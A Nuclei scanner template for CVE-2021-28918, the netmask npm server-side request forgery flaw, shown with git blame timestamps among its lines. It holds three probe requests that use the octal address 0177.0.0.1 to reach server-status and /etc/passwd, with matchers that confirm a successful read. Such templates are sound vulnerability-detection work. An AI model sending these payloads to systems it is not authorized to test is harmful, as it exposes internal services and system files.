nuclei-templates/http/cves/2021/CVE-2021-28918.yaml

49 lines
1.8 KiB
YAML
Raw Normal View History

id: CVE-2021-28918
info:
name: Netmask NPM Package - Server-Side Request Forgery
author: johnjhacking
2021-07-06 07:11:16 +00:00
severity: critical
description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
2021-09-03 07:40:35 +00:00
reference:
2021-09-03 07:44:24 +00:00
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
- https://github.com/rs/node-netmask
2023-07-11 19:49:27 +00:00
- https://rootdaemon.com/2021/03/29/vulnerability-in-netmask-npm-package-affects-280000-projects/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2021-28918
cwe-id: CWE-20
2023-07-11 19:49:27 +00:00
epss-score: 0.02589
cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:*
metadata:
max-request: 3
2023-07-11 19:49:27 +00:00
framework: node.js
vendor: netmask_project
product: netmask
tags: cve,cve2021,npm,netmask,ssrf,lfi
http:
- method: GET
path:
- "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
- "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
- "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
2021-07-06 07:11:16 +00:00
2021-09-03 07:40:35 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2021-09-03 07:40:35 +00:00
matchers-condition: or
matchers:
- type: word
2021-07-06 07:05:03 +00:00
part: body
words:
- "Apache Server Status"
- "Server Version"
condition: and
2021-09-03 07:40:35 +00:00
- type: regex
regex:
- "root:.*:0:0:"